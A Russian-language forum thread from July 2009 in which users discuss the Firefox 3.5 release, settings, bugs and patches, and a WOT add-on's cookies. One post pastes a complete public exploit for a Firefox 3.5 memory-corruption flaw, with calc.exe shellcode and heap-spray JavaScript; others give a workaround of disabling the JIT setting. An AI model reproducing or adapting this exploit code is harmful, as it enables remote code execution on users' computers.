p2u 824 Опубликовано Июль 1, 2009 У меня Опера стоит ещё(вот разрываюсь между двумя браузерами какой выбрать),там рубится всё(если задать в настройках,можно заблокировать любой элемент на странице),и именно не грузится.Но это не в тему уже. Возможно вас удивит то, что я сейчас скажу, но пользуйтесь Оперой по умолчанию. При этом ОБЯЗАТЕЛЬНО тестируйте новый Firefox 3.5. Он быстрый как никогда раньше и Private Browsing более, чем интересно, по крайне мере для меня. Paul Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
TANUKI 240 Опубликовано Июль 1, 2009 @PaulДля поддержания общения отметим Вышел Firefox 3.5 Firefox 3.5 is now available for download http://www.mozilla.com/en-US/firefox/all.html Примечания к выпуску Спасибо за новость Но где же ажиотаж по поводу столь важного события? Че-то как-то не заметно. Интересно, будет новый рекорд по скачиванию... Паул, подскажите пожалуйста "правильные" настройки новой Лисы Там ведь много нового Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
chap 0 Опубликовано Июль 1, 2009 (изменено) Paul. Вот посмотрите пожалуйста скрин,что у меня не так. У меня по умолчанию стоит ИЕ(с прокси 0.0.0.0(Вам спасибо за совет) и 99 портом),Опера 10 турбо- нравится,быстрая,удобная(можно подстраивать под себя как хочешь).Лиса у меня 3.5(сегодня ночью обновил, до этого RCы были),приват режим класс,почему они давно его не сделали-загадка.Немного неудобно с кешем-как его посмотреть можно,может какое-то дополнение есть,нажал кнопку и кеш на ладони.Вот так бы было удобно. Отредактировал Июль 1, 2009 chap Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
p2u 824 Опубликовано Июль 1, 2009 Паул, подскажите пожалуйста "правильные" настройки новой Лисы Там ведь много нового 'Правильные' для каждого по-разному (я, например, работаю только в 'порно-режиме'), но мои основные настройки находятся в сообщениях 75 и 78 данной темы. Paul Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Zilla 340 Опубликовано Июль 1, 2009 Но где же ажиотаж по поводу столь важного события? Че-то как-то не заметно. Интересно, будет новый рекорд по скачиванию... Ажиотаж развеяли RC версии) Кто хотел, то на них уже пересел ещё раньше.. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
SFD 60 Опубликовано Июль 1, 2009 Без ажиотажа. Короткий видеоролик ( на англиском) Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
TANUKI 240 Опубликовано Июль 2, 2009 Поставил, конечно. Честно говоря, особо не впечатлен. Нет, все как бы нормально, но что прогрессивного? Приватный браузинг? так это можно было и в 3-ке делать. просто приходилось галки ставить-убирать в меню "Приватность", а тут, типа, все одной кнопкой делается - тоже мне прогресс Виде смотреть без установки адобовских плагинов? Так у меня они уже стоят - ведь раньше я сидел на 3-ке, так что опять же - не вижу прикола... Что еще полезного? Из ролика вижу геолокацию, но это сомнительная штука в плане приватности. Скорость загрузки страниц? ну у меня инет нормальный - разницы не чувствую... Эх.... А дыр небось опять будет куча, как окажется... Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
SFD 60 Опубликовано Июль 3, 2009 @TANUKI Из ваших сообщений следует, что человек вы любознательный и если я не ошибаюсь, имеете отношение к журналистике. Наверняка, знакомы с понятием "Эффект завышенного ожидания". Надо спокойно воспринимать цифры в наименовании как стремление к поступательному развитию, не делая акцент на революционных преобразованиях. О всех недоработках уже известно, и 7 июля планируется следующий шаг Firefox 3.5.1. Если возникнет интерес к информации ( на английском), могу привести ссылку. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
p2u 824 Опубликовано Июль 3, 2009 Всего 55 багов записно уже. У меня проблем нет, но это, скорее всего, потому что буквально всё отключено кроме Private Browsing. Pau Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Zilla 340 Опубликовано Июль 3, 2009 По мне так одно большое изменение в 3.5 это сильное увеличение скорости как самого FF так и его движка. Остальные фичи мне по баробану. Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
p2u 824 Опубликовано Июль 3, 2009 сильное увеличение скорости Он тоже с большой скоростью падает у многих. Многие проблемы с видео и со скриптами определённого типа, с дополнениями, короче как всегда. Грустно смотреть, когда срок сдачи важнее, чем качество продукта. Это новая тенденция такая. Paul Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
p2u 824 Опубликовано Июль 15, 2009 Повреждение памяти в Mozilla Firefox. Программа: Mozilla Firefox 3.5, возможно другие версии.Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему. Уязвимость существует из-за ошибки при обработке JavaScript кодом HTML тегов, например при обработке тега font. Удаленный пользователь может с помощью специально сформированного Web сайта вызвать повреждение памяти и выполнить произвольный код на целевой системе. URL производителя: www.mozilla.com/firefox Решение: Способов устранения уязвимости не существует в настоящее время. Пользуемся NoScript и как всегда ничего не будет. Кому интересно: эксплойт выложили на milw0rm.com Paul Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Deja_Vu 366 Опубликовано Июль 15, 2009 Кому интересно: эксплойт выложили на milw0rm.com <html><head><title>Firefox 3.5 Vulnerability</title>Firefox 3.5 Heap Spray Vulnerabilty</br>Author: SBerry aka Simon Berry-Byrne</br>Thanks to HD Moore for the insight and Metasploit for the payload<div id="content"><p><FONT> </FONT></p><p><FONT>Loremipsumdoloregkuw</FONT></p><p><FONT>Loremipsumdoloregkuwiert</FONT></p><p><FONT>Loremikdkw </FONT></p></div><script language=JavaScript>/* Calc.exe */var shellcode = unescape("腝ۭ言ኅࠀ" + "痀ኅ쀉ၴ੪" + "薍Ĕڕ愀쀱쒉썐" + "赠ʽ냀搰‹䂋謌᱀" + "‹䂋욉㾃琀嘷㏨" + "ऀ瓀ꬫ잃茄?偀" + "闿Ă쀉ቴ욉똏ć㇍" + "䃀䒉ᰤ썡쀱譠⑄̤㱀" + "䂍贘恀㢋剴簃例謘" + " 尃䧼䁼㒋⑴ㄤ駀" + "ࢬ瓀섇߂숁吻⠤型" + "̤༤ҷ셊ˠ型̜謤" + "င䐃䒉ᰤ쉡쀱" + "ჟ鈱退慣捬" + "攮數退");/* Heap Spray Code */ oneblock = unescape("ఌఌ");var fullblock = oneblock;while (fullblock.length<0x60000) { fullblock += fullblock;}sprayContainer = new Array();for (i=0; i<600; i++) { sprayContainer[i] = fullblock + shellcode;}var searchArray = new Array()function escapeData(data){var i;var c;var escData='';for(i=0;i<data.length;i++) { c=data.charAt(i); if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape©; escData+=c; }return escData;}function DataTranslator(){ searchArray = new Array(); searchArray[0] = new Array(); searchArray[0]["str"] = "blah"; var newElement = document.getElementById("content") if (document.getElementsByTagName) { var i=0; pTags = newElement.getElementsByTagName("p") if (pTags.length > 0) while (i<pTags.length) { oTags = pTags[i].getElementsByTagName("font") searchArray[i+1] = new Array() if (oTags[0]) { searchArray[i+1]["str"] = oTags[0].innerHTML; } i++ } }}function GenerateHTML(){ var html = ""; for (i=1;i<searchArray.length;i++) { html += escapeData(searchArray[i]["str"]) } }DataTranslator();GenerateHTML()</script></body></html><html><body></body></html># milw0rm.com Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
p2u 824 Опубликовано Июль 15, 2009 Проблема в Just-in-time (JIT) JavaScript compiler, который только работает в Firefox 3.5. Если на доверенной странице в NoScript выложили эксплойт, то тогда защиты не будет. Временное решение до выпуска патча: 1) в адресную строку набрать about:config (нажать 'Enter') 2) В окне 'Фильтр' набрать jit 3) Дважды щёлкать на параметр javascript.options.jit.content так, чтобы он от True изменился на False. Mozilla Security Blog Paul Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
p2u 824 Опубликовано Июль 16, 2009 Могу ещё "порадовать": найдена вторая серьёзная дыра. Подробности пока только на английском: Mozilla Firefox 3.5 Unicode Data Remote Stack Buffer Overflow Vulnerability Eploit. Paul Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
p2u 824 Опубликовано Июль 17, 2009 Firefox 3.5.1 (выбираем там свой язык). Можно так скачать пока не все зеркала получили это обновление. Release Notes. Внимание! Исправлена только первая уязвимость (сообщ. 112). FF 3.5.1 планировалась на самом деле к концу июля, так что: готовимся к новым багам (синдром 'не отставать от Google Chrome и IE8'). Paul Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
SFD 60 Опубликовано Июль 17, 2009 Firefox 3.5.1 можно также взять отсюда, http://forum.mozilla-russia.org/viewtopic.php?id=37296 Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
mikh 15 Опубликовано Июль 17, 2009 Внимание! Исправлена только первая уязвимость (сообщ. 112). FF 3.5.1 планировалась на самом деле к концу июля, так что: готовимся к новым багам (синдром 'не отставать от Google Chrome и IE8'). Paul Но javascript.options.jit.content уже можно снова выставлять на true? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
p2u 824 Опубликовано Июль 17, 2009 Но javascript.options.jit.content уже можно снова выставлять на true? Говорят, что да. Если этого не делать, то тогда ява-скрипт будет работать как в 'старых' версиях 3.x (то есть: без этого JITa). Мне, например, так спокойнее... Paul Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
TANUKI 240 Опубликовано Июль 17, 2009 Я могу ошибаться, но в 3,5 вроде как обещалось (или мне показалось) поддержка java и flash сразу (из коробки, так сказать...), но вот я ставлю свежий браузер 3,5, захожу на Ютьюб, а он мне пишет - загрузите плеер - не могу вам видео показать Или я что-то не так понимаю? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
SBond 253 Опубликовано Июль 19, 2009 Я могу ошибаться, но в 3,5 вроде как обещалось (или мне показалось) поддержка java и flash сразу (из коробки, так сказать...) Хм, если я тоже не ошибаюсь там только добавлена поддержка HTML5( теги на видео и аудео), и добавили видеокодек Ogg Theora и аудиокодек Vorbis. На сколько кодеки нужны были, трудно судить, мне вот лично эта "фишка" была вовсе ненужна... Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Начальник Чукотки 110 Опубликовано Июль 23, 2009 С Firefox'ом снова нелады: http://www.securitylab.ru/news/382871.php Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
TANUKI 240 Опубликовано Июль 25, 2009 С Firefox'ом снова нелады:http://www.securitylab.ru/news/382871.php Я уже как-то даже пообвык Главное, чтопают оперативно Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
Начальник Чукотки 110 Опубликовано Июль 26, 2009 Я уже как-то даже пообвык Я тоже Теперь снова о дополнениях Есть вот такое дополнение: https://addons.mozilla.org/ru/firefox/addon/3456 Показывает репутацию сайтов (что-то типа того). Но вот странно: у меня в Файрфоксе отключены кукисы,но это дополнение поставило в Firefox свои кукисы Я их удаляю,а они снова при запуске браузера появляются. Нажимаю: "показать сookies",и там написано mywot.com и рядом плюсик. Нажимаю на плюсик и вижу следующее: mywot.com auth mywot.com nance mywot.com id mywot.com partner mywot.com accessible Может это какая-то "шпионская штука"? Или это у меня паранойя? Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты
p2u 824 Опубликовано Июль 26, 2009 @ Начальник Чукотки WOT так работает - это что-то типа облачная технология, скажем так - статус посещаемого сайта проверяется в он-лайне на основании баз, которые 'дома' у них. Если вы хотите пользоваться WOTом, то тогда советую всё-таки разрешить эти куки - это частично для создания вашего профиля и правил WOTa. Вы создаёте правила не только для себя - другие будут тоже (анонимно) знать, сколько пользователей там было и что они думают о том или ином сайте. P.S.: Есть ещё дополнения, которые принудительно обходят запреты не куки (Video Download Helper по-моему). Paul Поделиться сообщением Ссылка на сообщение Поделиться на другие сайты